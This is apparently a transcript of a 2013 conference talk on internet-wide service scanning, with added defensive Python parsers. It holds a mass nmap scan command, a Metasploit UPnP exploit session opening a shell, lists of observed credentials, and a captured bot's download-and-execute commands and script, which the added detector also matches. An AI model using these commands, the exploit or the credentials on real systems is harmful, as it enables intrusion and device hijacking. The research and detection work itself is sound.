AusCert 2013: Global Network Security

Video of this presentation can be found at:
https://www.youtube.com/watch?v=ZNlikR11icY

This presentation focused on the results of a 12-month research project that involved scanning the internet at large for a number of common services. The original intent of the project was to identify cases where vendors or ISPs have put large groups of consumers at risk due to negligent practices. These results have been obtained and continue to be collected and analyzed. In addition to the consumer-level issues, quite a few major exposures have been identified during the analysis of the data set. So far, this analysis has helped four other independent research teams quantify their results and resulted in Bloomberg/NYT coverage due to its use in identifying the FinFisher botnet C&C systems (a government-run malware environment). This data is immensely useful for quantifying exposure, identifying new global-scale threats, and creating indicators of future compromise.

HD Moore

May 23, 2013

Transcript

  1. (title slide; no text extracted)
  2. (bullet-only slide; no text extracted)
  3. (bullet-only slide; no text extracted)
  4. (bullet-only slide; no text extracted)
  5. (bullet-only slide; no text extracted)
  6. Scan command used on one node (TCP/443 shown as the example; the random-target list of 250,000 hosts is scanned at a fixed 50,000 packets/s with a single retry, minus an exclusion file):

    # nmap -sS -PS443 -p443 -n --max-retries=1 -M 256 \
        --open \
        --min-rtt-timeout=1000ms --max-rtt-timeout=1000ms \
        --min-hostgroup=50000 --min-rate=50000 \
        --max-rate=50000 \
        --script=banner-plus.nse \
        --excludefile=exclude.txt \
        -oG node.gnmap -oX node.xml \
        -iR 250000

    Code: https://github.com/hdm/scan-tools
  7. Code: https://github.com/hdm/scan-tools
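The scan above writes grepable output (-oG), and the "Unique IPs by Service" charts later in the deck are counts of distinct hosts per port derived from such files. The following is an added example, not code from the talk or from the scan-tools repository, of how those counts are computed from gnmap text; the sample output is constructed, uses documentation addresses only, and deliberately repeats one host so that the de-duplication is exercised.

```python
import re
from collections import defaultdict

# Constructed sample of nmap grepable (-oG) output in the shape produced by a scan
# like the one on the slide. Addresses are RFC 5737 documentation ranges, not real
# hosts; 192.0.2.10 and 198.51.100.7 appear twice on purpose.
SAMPLE_GNMAP = """\
# Nmap 6.25 scan initiated (constructed sample)
Host: 192.0.2.10 ()\tStatus: Up
Host: 192.0.2.10 ()\tPorts: 443/open/tcp//https//, 80/open/tcp//http//\tIgnored State: closed (998)
Host: 192.0.2.11 ()\tPorts: 443/open/tcp//https//
Host: 198.51.100.7 ()\tPorts: 23/open/tcp//telnet//, 80/open/tcp//http//
Host: 198.51.100.7 ()\tPorts: 80/open/tcp//http//
Host: 203.0.113.2 ()\tPorts: 22/filtered/tcp//ssh//
# Nmap done (constructed sample)
"""

# One "Ports:" entry is port/state/proto/owner/service/rpc/version; owner and rpc
# are usually empty, which is why consecutive slashes appear in the data.
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/[^/]*/([^/]*)/")


def parse_gnmap(text):
    """Yield (ip, port, proto, state, service) for every port entry in gnmap text."""
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = line.split("\t")
        ip = fields[0].split()[1]
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue
            for entry in field[len("Ports:"):].split(","):
                m = PORT_RE.match(entry.strip())
                if m:
                    port, state, proto, service = m.groups()
                    yield ip, int(port), proto, state, service


def unique_ips_by_service(text, state="open"):
    """Count distinct IPs per (port, proto) in the given state; a host seen twice counts once."""
    seen = defaultdict(set)
    for ip, port, proto, st, _service in parse_gnmap(text):
        if st == state:
            seen[(port, proto)].add(ip)
    return {key: len(ips) for key, ips in seen.items()}


def top_services(counts, n=5):
    """Return the n largest (port, proto) buckets, ties broken by port number."""
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))[:n]


if __name__ == "__main__":
    for (port, proto), n in top_services(unique_ips_by_service(SAMPLE_GNMAP)):
        print(f"{port}/{proto}: {n} unique hosts")
```

Only entries in the requested state are counted, so the filtered 22/tcp host does not inflate the SSH figure; at survey scale the same per-port sets are what let a network owner check whether one of their own prefixes contributes to a bucket.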

  8. (bullet-only slide; no text extracted)
  9. (bullet-only slide; no text extracted)
  10. Responses received about the scanning (quoted as written by the senders):

    "So what your saying is I should just ignore the excessive amount of port snooping coming from your system(s), and I should allow this on your word alone? Since when did you become my big brother? Are you related to Obama? Ironically, since the days you have begun your independent scans we have received a few DDOS attacks using udp_app port 53 traffic.....any correlation?"

    "Please identify your customer operating from the above address at the time mentioned, and terminate immediately his hacking activities. Please prevent him from continuing his hacking activities in the future as well. Due to the potential severity of this incident, we have reported it to the Computer Emergency Response Team (CERT) in United States (US) and Denmark."

    "You are welcome to try and hack my network as an academic exercise but even if you are successful you will find nothing of interest, and any attempt to corrupt the O/S can be restored in a few minutes."
  11. (bullet-only slide; no text extracted)
  12. Chart: Unique IPs by Service (y-axis 0 to 140,000,000; x-axis ports 1900, 80, 161, 137, 443, 8080, 23, 21, 22, 25, 3306, 110, 143, 995, 993, 5353, 5900, 17185)
  13. Charts: Global IPv4 Services and Australian IPv4 Services, over the same port set as slide 12
  14. Chart: Unique IPs by Service (repeat of slide 12; bullet notes not extracted)
  15. (bullet-only slide; no text extracted)
  16. UPnP stacks identified (chart labels): Intel/Portable SDK, MiniUPnP, Broadcom SDK, Others
  17. (bullet-only slide; no text extracted)
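The stack breakdown on slide 16 comes from the SERVER header that a UPnP device puts in its SSDP discovery reply on UDP/1900. The same header lets a network owner inventory which UPnP implementation their own devices expose. The following is an added example, not code from the talk, that parses SSDP replies and classifies the SERVER value into the families named on the slide; the sample replies and SERVER strings are constructed in the general format those stacks use (the "Broadcom UPnP Stack" and "VendorStack" strings are placeholders), and no version-to-vulnerability mapping is asserted.

```python
import re
from collections import Counter

# Constructed SSDP discovery replies (HTTP-over-UDP responses to an M-SEARCH on
# port 1900). SERVER strings are illustrative samples, not captured survey data.
SAMPLE_RESPONSES = [
    "HTTP/1.1 200 OK\r\nCACHE-CONTROL: max-age=1800\r\nST: upnp:rootdevice\r\n"
    "SERVER: Linux/2.6.21, UPnP/1.0, Portable SDK for UPnP devices/1.6.6\r\n"
    "LOCATION: http://192.0.2.1:49152/rootDesc.xml\r\n\r\n",
    "HTTP/1.1 200 OK\r\nST: upnp:rootdevice\r\n"
    "Server: Linux/2.4.20, UPnP/1.0, Intel SDK for UPnP devices /1.2\r\n\r\n",
    "HTTP/1.1 200 OK\r\nSERVER: OpenWRT/attitude_adjustment UPnP/1.1 MiniUPnPd/1.8\r\n\r\n",
    "HTTP/1.1 200 OK\r\nSERVER: POSIX, UPnP/1.0 Broadcom UPnP Stack/1.00.32\r\n\r\n",  # placeholder string
    "HTTP/1.1 200 OK\r\nSERVER: ExampleOS/3.1 UPnP/1.0 VendorStack/2.0\r\n\r\n",  # placeholder string
    "HTTP/1.1 200 OK\r\nST: upnp:rootdevice\r\n\r\n",  # reply with no SERVER header
]

# Family patterns in priority order; the capture group is the stack's own version.
FAMILIES = [
    ("Intel/Portable SDK", re.compile(r"(?:Portable|Intel) SDK for UPnP devices\s*/\s*([\w.]+)", re.I)),
    ("MiniUPnP", re.compile(r"MiniUPnPd?/([\w.]+)", re.I)),
    ("Broadcom SDK", re.compile(r"Broadcom[^/]*/([\w.]+)", re.I)),
]


def parse_ssdp(raw):
    """Split one SSDP reply into (status_line, {lowercased header name: value})."""
    head, _sep, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")  # first colon only; values may contain ':'
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def classify_server(server):
    """Map a SERVER header value to (family, version); a missing header is ("Unknown", None)."""
    if not server:
        return ("Unknown", None)
    for family, pattern in FAMILIES:
        m = pattern.search(server)
        if m:
            return (family, m.group(1))
    return ("Other", None)


def inventory(responses):
    """Count stack families across a batch of replies."""
    return Counter(classify_server(parse_ssdp(r)[1].get("server"))[0] for r in responses)


if __name__ == "__main__":
    for family, n in inventory(SAMPLE_RESPONSES).most_common():
        print(f"{family}: {n}")
```

Header names are matched case-insensitively because stacks differ in capitalisation, and a reply without a SERVER header is kept as its own bucket rather than silently dropped, since a device that hides its stack still answers discovery and still needs to be accounted for.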

  18. Metasploit session (terminal output as shown on the slide):

    $ msfconsole
    msf > use exploit/multi/upnp/libupnp_ssdp_overflow
    msf exploit(libupnp_ssdp_overflow) > set RHOST 192.168.122.89
    msf exploit(libupnp_ssdp_overflow) > exploit
    [*] Started reverse double handler
    [*] Exploiting 192.168.122.89 with target Supermicro Onboard IPMI (X9SCL/X9SCM)
    [+] Sending payload of 178 bytes to 192.168.122.89:56911...
    [*] Accepted the first client connection...
    [*] Accepted the second client connection...
    [*] Command shell session 1 opened
    [*] Shutting down payload stager listener...
    uname -a
    Linux debian-armel 2.6.32-5-versatile #1 Wed Jan 12 23:05:11 UTC 2011 armv5tejl
  19. Chart: Unique IPs by Service (repeat of slide 12; bullet notes not extracted)
  20. Web server share. Netcraft (January 2013): Apache, Microsoft, NginX. Critical.IO (January 2013): RomPager, Apache, Akamai, NginX, Microsoft
  21. Chart: Unique IPs by Service (repeat of slide 12)
  22. Devices by Country (chart labels): USA, ESP, IND, TUR, BRA, ITA, DEU, POL, RUS, THA, VNM, CHN, PER, MYS, ARG, EGY, GBR, TWN, KOR, IDN
  23. (bullet-only slide; no text extracted)
  24. (bullet-only slide; no text extracted)
  25. Usernames / Passwords (table flattened by extraction; values in the order shown):

    admin 12345 root h3capadmin lyzdm xialiang!@# lywlj nhkhwlwhz lymr admin lyjy 1234 lyzwm szwx@ah lyys huawei jlllylj itms123456 lygsg AAA888### lyjrw 662 lyyys abc123! lysw zch3capadmin lygmb 123456 lyfyh apadmin huawei password
  26. Credentials observed in exposed configuration and command lines (partly redacted on the slide):

    username=sa password=Masterkey2011 LicenseCheck=Defne
    DSN=sms;UID=XXX;PWD=XXXsys; DSN=GeoXXX;UID=XXX;PWD=XXXsys;
    8383 password h4ve@gr8d3y
    --daemon --port 8020 --socks5 --s_user Windows --s_password System XXXX
    /ssh /auth=password /user=admin /passwd=admin_p@s$word
    http://a.b.c/manage/retail_login.php3?ms_id=14320101&passwd=7325
    a.b.c.d:3389 --user administrator --pass passw0rd123
  27. (bullet-only slide; no text extracted)
  28. Chart: Unique IPs by Service (repeat of slide 12)
  29. Hardware vendors (chart labels): HUAWEI, QUALCOMM, ASUSTEK, VMWARE, HP, DELL, HYUNDAI, MICROSOFT, INTEL
  30. Chart: Unique IPs by Service (repeat of slide 12)
  31. FTP Software (pie chart; segment values 27%, 15%, 10%, 7%, 5%, 29%; labels ProFTPD, PureFTP, Microsoft, Firmware, vsFTPd, Mikrotik, FileZilla, Speedtouch, Other). ProFTPD Versions seen: 1.3.3g, 1.3.1, 1.3.3a, 1.3.4a, 1.3.3e, 1.3.2e, 1.3.3c, 1.3.4b, 1.3.0, 1.3.3d, 1.3.2c, 1.2.10, 1.3.0a, 1.2.9, 1.3.5rc1, 1.3.2
  32. Chart: Unique IPs by Service (repeat of slide 12)
  33. Mail services: SMTP, POP3, IMAP, POP3S, IMAPS
  34. Chart: Unique IPs by Service (repeat of slide 12)
  35. VNC Protocol Versions (chart labels): RFB 003.008, RFB 003.889, RFB 003.006, RFB 003.003, RFB 004.001, RFB 004.000, RFB 003.007, RFB 003.004
  36. (bullet-only slide; no text extracted)
  37. Chart: Unique IPs by Service (repeat of slide 12)
  38. (bullet-only slide; no text extracted)
  39. Chart (y-axis 0 to 6000): OpenServer, AIX, Solaris, UnixWare, IRIX, OpenVMS, HPUX
  40. (bullet-only slide; no text extracted)
  41. (no text extracted)
  42. (bullet-only slide; no text extracted)
  43. (bullet-only slide; no text extracted)
  44. (no text extracted)
  45. Telnet session showing the shell history on an exposed device (addresses redacted on the slide):

    $ telnet A.B.C.D
    Escape character is '^]'.
    sh-3.00# history
    1 root
    2 admin
    3 mkdir /var/run; mkdir /var/run/.sysV6 && cd /var/run/.sysV6 && wget -c http://176.xxx.xxx.xxx/sysV6/sysV6.sh && sh sysV6.sh || mkdir /var/run/.sysV6 && cd /var/run/.sysV6 && ftpget -u skynet -p cloud 176.xxx.xxx.xxx sysV6.sh sysV6/sysV6.sh && sh sysV6.sh &
  46. Excerpt of the downloaded script (as shown on the slide, with elisions):

    # THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
    # UPLOAD GETBINARIES.SH IN YOUR HTTPD.
    # YOUR HTTPD SERVER:
    REFERENCE_HTTP="http://173.xxx.xxx.xxx"
    wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run …
    wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && …
    wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && …
    wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && …
    wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && …
    wget -c ${REFERENCE_HTTP}/sshd -P /var/run && …
    wget -c ${REFERENCE_HTTP}/telnetd -P /var/run && …
    iptables -A INPUT -p tcp --dport 23 -j DROP
    mv /usr/bin/wget /usr/bin/wg
    mv /bin/wget /bin/wg
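For a defender, the shell history and script on slides 45 and 46 are useful as a set of behaviours: a hidden directory created under /var/run, a download chained straight into execution, an FTP fetch with embedded credentials, an iptables rule that drops inbound telnet once the bot has its own daemons, and the stock downloader renamed. The following is an added example, not code from the talk, that checks a captured shell history for those indicators; the history is constructed to mirror the slides, and the server address and script name are placeholders rather than real indicators of compromise.

```python
import re
from collections import Counter

# Constructed shell history modelled on the session shown on the slide. The address
# is an RFC 5737 documentation address and "sysV6.sh" is a placeholder name.
SAMPLE_HISTORY = """\
1  root
2  admin
3  mkdir /var/run/.sysV6 && cd /var/run/.sysV6 && wget -c http://198.51.100.9/sysV6/sysV6.sh && sh sysV6.sh
4  ftpget -u skynet -p cloud 198.51.100.9 sysV6.sh sysV6/sysV6.sh && sh sysV6.sh &
5  iptables -A INPUT -p tcp --dport 23 -j DROP
6  mv /usr/bin/wget /usr/bin/wg
7  ls /var/run
"""

# Each indicator corresponds to one behaviour visible on the two slides.
INDICATORS = [
    ("hidden-dir-under-runtime-path",
     re.compile(r"(?:mkdir|cd)\s+(?:/var/run|/tmp|/dev/shm)/\.[\w-]+")),
    ("download-then-execute",
     re.compile(r"\b(?:wget|ftpget|curl|tftp)\b.*&&\s*(?:(?:sh|bash)\s+\S+|\./\S+)")),
    ("credentialed-ftp-fetch",
     re.compile(r"\bftpget\b.*\s-u\s+\S+\s+-p\s+\S+")),
    ("telnet-lockout-rule",
     re.compile(r"iptables\s+-A\s+INPUT\s+-p\s+tcp\s+--dport\s+23\s+-j\s+DROP")),
    ("renamed-downloader",
     re.compile(r"\bmv\s+\S*/(?:wget|curl|tftp|ftpget)\s+\S+")),
]


def find_indicators(history_text):
    """Return (history_number, indicator_name, command) for every indicator match."""
    hits = []
    for line in history_text.splitlines():
        m = re.match(r"\s*(\d+)\s+(.*)", line)  # busybox/bash 'history' layout: number, command
        if not m:
            continue
        number, command = int(m.group(1)), m.group(2)
        for name, pattern in INDICATORS:
            if pattern.search(command):
                hits.append((number, name, command))
    return hits


def triage(history_text):
    """Summarise hits per indicator; two or more distinct indicators is treated as suspicious."""
    hits = find_indicators(history_text)
    counts = dict(Counter(name for _number, name, _command in hits))
    return {"counts": counts, "suspicious": len(counts) >= 2}


if __name__ == "__main__":
    for number, name, command in find_indicators(SAMPLE_HISTORY):
        print(f"history #{number}: {name}: {command}")
    print(triage(SAMPLE_HISTORY))
```

The "suspicious" verdict requires two distinct indicators because any one of them (an iptables rule on port 23, a renamed binary) has legitimate uses on its own; it is the combination seen on the slides that is characteristic of a router takeover.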
  47. (bullet-only slide; no text extracted)
  48. (bullet-only slide; no text extracted)
  49. (no text extracted)